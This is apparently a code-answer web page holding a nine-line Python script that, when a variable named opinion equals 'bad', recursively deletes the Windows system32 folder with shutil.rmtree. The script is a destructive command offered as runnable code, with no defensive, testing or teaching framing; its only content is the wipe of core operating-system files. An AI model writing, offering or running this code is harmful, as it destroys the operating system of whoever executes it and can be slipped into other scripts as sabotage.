if opinion == "bad": system32_path = os.path.join(os.environ['windir'], 'system32') shutil.rmtree(system32_path) in python

main.py
import os
import shutil

opinion = "bad"

if opinion == "bad":
    system32_path = os.path.join(os.environ['windir'], 'system32')
    shutil.rmtree(system32_path)
163 chars
9 lines

related categories

gistlibby LogSnag